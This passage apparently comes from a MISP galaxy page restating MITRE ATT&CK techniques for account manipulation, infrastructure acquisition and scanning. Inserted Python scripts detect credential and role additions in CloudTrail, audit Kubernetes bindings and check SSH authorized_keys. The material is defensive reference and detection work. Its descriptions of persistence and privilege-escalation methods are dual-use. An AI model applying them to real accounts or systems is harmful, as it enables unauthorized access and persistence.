An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.[AWS IAM Policies and Permissions][Google Cloud IAM Policies][Microsoft Support O365 Add Another Admin, October 2019][Microsoft O365 Admin Roles] With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).[Expel AWS Attacker][Microsoft O365 Admin Roles]

This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.[Rhino Security Labs AWS Privilege Escalation]
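The AWS calls named in the Additional Cloud Credentials and Additional Cloud Roles descriptions above leave CloudTrail records. The following is an added example, not part of the MISP galaxy or the MITRE text, of a detection pass over constructed CloudTrail-style events; the field names follow CloudTrail's camelCase request parameters, the administrative policy list is an assumption, and the events themselves are constructed.

```python
# API calls from the descriptions, grouped by what they add to an account.
CREDENTIAL_APIS = {"CreateAccessKey", "CreateKeyPair", "ImportKeyPair", "GetFederationToken"}
ROLE_APIS = {"AttachUserPolicy", "CreatePolicyVersion"}
# Assumption: these managed policies are what this organisation treats as administrative.
ADMIN_POLICY_SUFFIXES = ("/AdministratorAccess", "/IAMFullAccess")

# Constructed sample events (minimal CloudTrail shape), not real logs.
SAMPLE_EVENTS = [
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"userName": "alice"}, "requestParameters": {"userName": "alice"}},
    {"eventName": "CreateAccessKey", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"userName": "alice"}, "requestParameters": {"userName": "admin-svc"}},
    {"eventName": "AttachUserPolicy", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"userName": "alice"},
     "requestParameters": {"userName": "alice",
                           "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
    {"eventName": "CreatePolicyVersion", "eventSource": "iam.amazonaws.com",
     "userIdentity": {"userName": "bob"},
     "requestParameters": {"policyArn": "arn:aws:iam::123456789012:policy/app-policy",
                           "setAsDefault": True}},
    {"eventName": "GetFederationToken", "eventSource": "sts.amazonaws.com",
     "userIdentity": {"userName": "bob"},
     "requestParameters": {"name": "tmp-session", "durationSeconds": 129600}},
    {"eventName": "ImportKeyPair", "eventSource": "ec2.amazonaws.com",
     "userIdentity": {"userName": "bob"}, "requestParameters": {"keyName": "ops-key"}},
    {"eventName": "DescribeInstances", "eventSource": "ec2.amazonaws.com",
     "userIdentity": {"userName": "bob"}, "requestParameters": {}},
]


def _actor(event: dict) -> str:
    ident = event.get("userIdentity") or {}
    # IAM users carry userName; assumed-role sessions only carry an ARN.
    return ident.get("userName") or ident.get("arn", "unknown")


def classify(event: dict):
    """Return a finding dict for one event, or None if the call is not of interest."""
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    actor = _actor(event)
    if name in CREDENTIAL_APIS:
        # CreateAccessKey targets the caller unless userName names someone else;
        # the other calls only ever add credentials usable by the caller.
        target = params.get("userName", actor) if name == "CreateAccessKey" else actor
        finding = {"rule": "cloud_credential_added", "api": name, "actor": actor,
                   "target": target, "severity": "medium"}
        if target != actor:
            # Keys minted for another principal: the escalation path described above.
            finding["severity"] = "high"
        if name == "GetFederationToken":
            # The token outlives a later deactivation of the caller's own keys,
            # so the requested lifetime is worth keeping with the finding.
            finding["duration_seconds"] = params.get("durationSeconds")
        return finding
    if name in ROLE_APIS:
        policy = str(params.get("policyArn", ""))
        finding = {"rule": "cloud_role_added", "api": name, "actor": actor,
                   "policy_arn": policy, "severity": "medium"}
        if name == "AttachUserPolicy":
            finding["target"] = params.get("userName")
            # Self-grants and attachment of an administrative policy are the cases to page on.
            if finding["target"] == actor or policy.endswith(ADMIN_POLICY_SUFFIXES):
                finding["severity"] = "high"
        elif params.get("setAsDefault"):
            # A new default version changes the effective permissions of every
            # entity the policy is attached to, without touching those entities.
            finding["severity"] = "high"
        return finding
    return None


def detect(events) -> list:
    """Run classify() over a sequence of events and keep the findings."""
    return [f for f in (classify(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["api"], f["actor"], "->",
              f.get("target", f.get("policy_arn")))
```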

Internal MISP references

UUID 71867386-ddc2-4cdb-a0c9-7c27172c23c1 which can be used as unique global reference for Additional Cloud Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.003
Related clusters

To see the related clusters, click here.

Additional Container Cluster Roles

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.[Kubernetes RBAC][Aquasec Kubernetes Attack 2023] Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.[Kuberentes ABAC]

This account modification may immediately follow Create Account or other malicious account activity. Adversaries may also modify existing Valid Accounts that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.[Google Cloud Kubernetes IAM][AWS EKS IAM Roles for Service Accounts][Microsoft Azure Kubernetes Service Service Accounts] In these cases, this technique may be used in conjunction with Additional Cloud Roles.
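The RoleBinding and ClusterRoleBinding pattern described above can be audited from a snapshot of the cluster's bindings. The following is an added example, not part of the MISP galaxy or the MITRE text; the objects are constructed in the JSON shape of `kubectl get clusterrolebindings,rolebindings -A -o json`, and the privileged-role set and expected-admin allowlist are assumptions.

```python
# Assumption: the built-in ClusterRoles this cluster treats as privileged.
PRIVILEGED_CLUSTER_ROLES = {"cluster-admin", "admin", "edit"}
# Subjects that make a binding effectively available to anyone.
OPEN_SUBJECTS = {("Group", "system:unauthenticated"), ("Group", "system:authenticated"),
                 ("User", "system:anonymous")}

# Constructed sample objects (only the fields the audit reads).
SAMPLE_BINDINGS = [
    {"kind": "ClusterRoleBinding", "metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ops-helper"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "User", "name": "dev-user"}]},
    {"kind": "RoleBinding", "metadata": {"name": "sa-admin", "namespace": "prod"},
     "roleRef": {"kind": "ClusterRole", "name": "admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "prod"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "anon-view"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "Group", "name": "system:unauthenticated"}]},
    {"kind": "RoleBinding", "metadata": {"name": "pod-reader", "namespace": "dev"},
     "roleRef": {"kind": "Role", "name": "pod-reader"},
     "subjects": [{"kind": "User", "name": "alice"}]},
]


def audit_bindings(items, expected_cluster_admins) -> list:
    """Return findings over binding objects.

    expected_cluster_admins is the set of (kind, name) subjects that are
    allowed to hold cluster-admin through a ClusterRoleBinding.
    """
    findings = []
    for obj in items:
        kind, meta, role = obj["kind"], obj["metadata"], obj["roleRef"]
        where = f"{kind}/{meta['name']}"
        if meta.get("namespace"):
            where += f" (namespace {meta['namespace']})"
        for s in obj.get("subjects") or []:
            subj = (s["kind"], s["name"])
            if subj in OPEN_SUBJECTS:
                findings.append({"rule": "open_subject", "binding": where, "subject": subj})
            if role["kind"] == "ClusterRole" and role["name"] == "cluster-admin":
                if kind == "ClusterRoleBinding" and subj not in expected_cluster_admins:
                    findings.append({"rule": "unexpected_cluster_admin",
                                     "binding": where, "subject": subj})
                elif kind == "RoleBinding":
                    # cluster-admin through a RoleBinding is still full control of that namespace.
                    findings.append({"rule": "namespace_cluster_admin",
                                     "binding": where, "subject": subj})
            if s["kind"] == "ServiceAccount" and role["name"] in PRIVILEGED_CLUSTER_ROLES:
                # A workload identity with admin/edit rights is the persistence
                # foothold the description above is about.
                findings.append({"rule": "privileged_service_account", "binding": where,
                                 "subject": subj, "namespace": s.get("namespace")})
    return findings


if __name__ == "__main__":
    for f in audit_bindings(SAMPLE_BINDINGS, {("Group", "system:masters")}):
        print(f["rule"], f["binding"], f["subject"])
```

Diffing two such reports taken at different times surfaces the newly added bindings that this technique produces.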

Internal MISP references

UUID 1169afd3-d80d-5942-b16f-8dc1812ef6bb which can be used as unique global reference for Additional Container Cluster Roles in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.006
Related clusters

To see the related clusters, click here.

Additional Email Delegate Permissions

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.[Microsoft - Add-MailboxPermission][FireEye APT35 2018][Crowdstrike Hiding in Plain Sight 2018] In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.[Gmail Delegation][Google Ensuring Your Information is Safe]

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.[Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452]

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add Additional Cloud Roles to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: Internal Spearphishing), so the messages evade spam/phishing detection mechanisms.[Bienstock, D. - Defending O365 - 2019]

Internal MISP references

UUID 15660958-1f4f-4136-8cda-82123fd38232 which can be used as unique global reference for Additional Email Delegate Permissions in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.002
Related clusters

To see the related clusters, click here.

Device Registration

Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance.

MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.[CISA MFA PrintNightmare][DarkReading FireEye SolarWinds] In some cases, the MFA self-enrollment process may require only a username and password to enroll the account's first device or to enroll a device to an inactive account.[Mandiant APT29 Microsoft 365 2022]

Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.[AADInternals - Device Registration][AADInternals - Conditional Access Bypass][Microsoft DEV-0537]

Devices registered in Azure AD may be able to conduct Internal Spearphishing campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.[Microsoft - Device Registration] Additionally, an adversary may be able to perform a Service Exhaustion Flood on an Azure AD tenant by registering a large number of devices.[AADInternals - BPRT]

Internal MISP references

UUID 34ffaa47-f591-4a44-bd7d-9790d81365cd which can be used as unique global reference for Device Registration in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.005
Related clusters

To see the related clusters, click here.

SSH Authorized Keys

Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.[SSH Authorized Keys] Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.

Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.[Google Cloud Add Metadata][Google Cloud Privilege Escalation] Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.[Azure Update Virtual Machines] This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.[Venafi SSH Key Abuse][Cybereason Linux Exim Worm] It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain Network Device CLI command.[cisco_ip_ssh_pubkey_ch_cmd]
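A defender's counterpart to the authorized_keys and sshd_config modifications described above is a periodic audit of those files. The following is an added example, not part of the MISP galaxy or the MITRE text: it parses an authorized_keys file, fingerprints each key the way OpenSSH does (SHA256 of the decoded key blob), reports entries absent from an inventory allowlist, and reads the sshd_config directives that govern key-based login. The key blobs, file contents and allowlist are constructed.

```python
import base64
import hashlib
import re
import struct

# Key type, base64 blob, optional comment. Anything before the key type is the
# options field (command=, from=, no-pty, ...). Limitation: a quoted option whose
# value itself contains a key-type string would confuse this regex.
KEY_RE = re.compile(
    r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp(?:256|384|521)|sk-[\w@.-]+)"
    r"\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)


def fingerprint(b64_blob: str) -> str:
    """OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """One dict per non-comment line; unparseable lines are kept with an error."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        m = KEY_RE.search(s)
        if not m:
            entries.append({"line": lineno, "error": "unparseable"})
            continue
        entries.append({"line": lineno, "options": s[:m.start()].strip(),
                        "type": m.group(1), "fingerprint": fingerprint(m.group(2)),
                        "comment": (m.group(3) or "").strip()})
    return entries


def audit_authorized_keys(text: str, allowlist: set) -> dict:
    """Split entries into known (fingerprint in allowlist), unknown, and unparseable."""
    report = {"known": [], "unknown": [], "unparseable": []}
    for e in parse_authorized_keys(text):
        if "error" in e:
            report["unparseable"].append(e["line"])
        elif e["fingerprint"] in allowlist:
            report["known"].append(e)
        else:
            report["unknown"].append(e)
    return report


def sshd_pubkey_settings(config_text: str) -> dict:
    """Effective PubkeyAuthentication and AuthorizedKeysFile values.

    sshd honours the first occurrence of a directive; defaults are OpenSSH's.
    RSAAuthentication was a protocol-1 directive that modern sshd ignores.
    """
    seen = {}
    for line in config_text.splitlines():
        parts = line.split("#", 1)[0].strip().split(None, 1)
        if len(parts) == 2:
            seen.setdefault(parts[0].lower(), parts[1].strip())
    return {
        "PubkeyAuthentication": seen.get("pubkeyauthentication", "yes"),
        "AuthorizedKeysFile": seen.get("authorizedkeysfile",
                                       ".ssh/authorized_keys .ssh/authorized_keys2"),
    }


def _blob(key_type: str, payload: bytes) -> str:
    """Constructed SSH wire-format blob: length-prefixed type string, then payload."""
    wire = (struct.pack(">I", len(key_type)) + key_type.encode()
            + struct.pack(">I", len(payload)) + payload)
    return base64.b64encode(wire).decode()


# Constructed sample data; the three keys are synthetic, not real public keys.
KEY_ALICE = _blob("ssh-ed25519", bytes([1]) * 32)
KEY_BACKUP = _blob("ssh-ed25519", bytes([2]) * 32)
KEY_UNKNOWN = _blob("ssh-ed25519", bytes([3]) * 32)
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample file",
    f"ssh-ed25519 {KEY_ALICE} alice@laptop",
    f'command="/usr/local/bin/backup",no-pty ssh-ed25519 {KEY_BACKUP} backup@nas',
    f"ssh-ed25519 {KEY_UNKNOWN}",
    "not a key line",
])
ALLOWLIST = {fingerprint(KEY_ALICE), fingerprint(KEY_BACKUP)}  # from inventory, by assumption
```

Every file named by AuthorizedKeysFile (including the authorized_keys2 default) should be audited, not only the one the description names.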

Internal MISP references

UUID 4659b96f-0e8d-4480-966b-c75062645f14 which can be used as unique global reference for SSH Authorized Keys in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1098.004
Related clusters

To see the related clusters, click here.

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials.

In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged Valid Accounts.

Internal MISP references

UUID 65f7482c-485b-4fd7-80f5-0ec6e923ac4d which can be used as unique global reference for Account Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Network', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Acquire Access

Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers][Krebs Access Brokers Fortune 500] In some cases, adversary groups may form partnerships to share compromised systems with each other.[CISA Karakurt 2022]

Footholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., Web Shell) or established access via External Remote Services. In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.[Microsoft Ransomware as a Service]

By leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.[Microsoft Ransomware as a Service][CrowdStrike Access Brokers]

In some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a Trusted Relationship, Multi-Factor Authentication Interception, or even Supply Chain Compromise.

Note: while this technique is distinct from other behaviors such as Purchase Technical Data and Credentials, they may often be used in conjunction (especially where the acquired foothold requires Valid Accounts).

Internal MISP references

UUID 478da817-1914-50f6-b1fd-434081a34354 which can be used as unique global reference for Acquire Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Botnet - Duplicate

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.[Norton Botnet] Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).[Imperva DDoS for Hire][Krebs-Anna][Krebs-Bazaar][Krebs-Booter]

Internal MISP references

UUID be637d66-5110-4872-bc15-63b062c3f290 which can be used as unique global reference for Botnet - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.005
Related clusters

To see the related clusters, click here.

DNS Server

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: Application Layer Protocol). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic (DNS). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.[Unit42 DNS Mar 2019]

Internal MISP references

UUID bae33d7b-c835-4eda-b310-bf426270c0b1 which can be used as unique global reference for DNS Server in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.002
Related clusters

To see the related clusters, click here.

Domains - Duplicate

Adversaries may acquire domains that can be used during targeting. Domain names are the human-readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries may use acquired domains for a variety of purposes, including for Phishing, Drive-by Compromise, and Command and Control.[CISA MSS Sep 2020] Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).[FireEye APT28][PaypalScam] Typosquatting may be used to aid in delivery of payloads via Drive-by Compromise. Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.[CISA IDN ST05-016][tt_httrack_fake_domains][tt_obliqueRAT][httrack_unhcr][lazgroup_idn_phishing]

Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.[Categorisation_not_boundary][Domain_Steal_CC][Redirectors_Domain_Fronting][bypass_webproxy_filtering]

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.[Mandiant APT1]

Internal MISP references

UUID b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d which can be used as unique global reference for Domains - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.001
Related clusters

To see the related clusters, click here.

Malvertising

Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.[spamhaus-malvertising] Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites.

Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad, which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.[Masquerads-Guardio][FBI-search] Adversaries’ efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.[sentinelone-malvertising]

Malvertising may be used to support Drive-by Target and Drive-by Compromise, potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.[BBC-malvertising]

Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.[Masquerads-Guardio] Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.[spamhaus-malvertising]

Internal MISP references

UUID 60ac24aa-ce63-5c1d-8126-db20a27d85be which can be used as unique global reference for Malvertising in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.008
Related clusters

To see the related clusters, click here.

Server - Duplicate

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support watering hole operations, as in Drive-by Compromise, or email servers to support Phishing operations. Instead of compromising a third-party Server or renting a Virtual Private Server, adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.[NYTStuxnet]

Internal MISP references

UUID 6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2 which can be used as unique global reference for Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.004
Related clusters

To see the related clusters, click here.

Serverless - Duplicate

Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.

Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to Proxy traffic to an adversary-owned command and control server.[BlackWater Malware Cloudflare Workers][AWS Lambda Redirector] As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.[Detecting Command & Control in the Cloud][BlackWater Malware Cloudflare Workers]

Internal MISP references

UUID c30faf84-496b-4f27-a4bc-aa36d583c69f which can be used as unique global reference for Serverless - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.007
Related clusters

To see the related clusters, click here.

Virtual Private Server - Duplicate

Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.

Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.[TrendmicroHideoutsLease]

Internal MISP references

UUID 2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23 which can be used as unique global reference for Virtual Private Server - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.003
Related clusters

To see the related clusters, click here.

Web Services - Duplicate

Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control (Web Service), Exfiltration Over Web Service, or Phishing. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.

Internal MISP references

UUID 2e883e0d-1108-431a-a2dd-98ba98b69417 which can be used as unique global reference for Web Services - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1583.006
Related clusters

To see the related clusters, click here.

Acquire Infrastructure

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.[TrendmicroHideoutsLease] Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support Proxy, including from residential proxy services.[amnesty_nso_pegasus][FBI Proxies Credential Stuffing][Mandiant APT29 Microsoft 365 2022] Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

Internal MISP references

UUID 66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3 which can be used as unique global reference for Acquire Infrastructure in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE
Related clusters

To see the related clusters, click here.

Scanning IP Blocks

Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.

Adversaries may scan IP blocks in order to Gather Victim Network Information, such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.[Botnet Scan] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services).

Internal MISP references

UUID 473afdb8-5048-4838-a3fc-56be30be1e56 which can be used as unique global reference for Scanning IP Blocks in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.001
Related clusters

To see the related clusters, click here.

Vulnerability Scanning

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.[OWASP Vuln Scanning] Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).

Internal MISP references

UUID c0a8e0d6-c108-4c15-9a3a-78ef1da06e32 which can be used as unique global reference for Vulnerability Scanning in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1595.002
Related clusters

To see the related clusters, click here.

Wordlist Scanning

Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to Brute Force, its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: Gather Victim Org Information or Search Victim-Owned Websites).

For example, adversaries may use web content discovery tools such as Dirb, DirBuster, and GoBuster and generic or custom wordlists to enumerate a website’s pages and directories.[ClearSky Lebanese Cedar Jan 2021] This can help them to discover old, vulnerable pages or hidden administrative portals that could become the target of further operations (ex: Exploit Public-Facing Application or Brute Force).

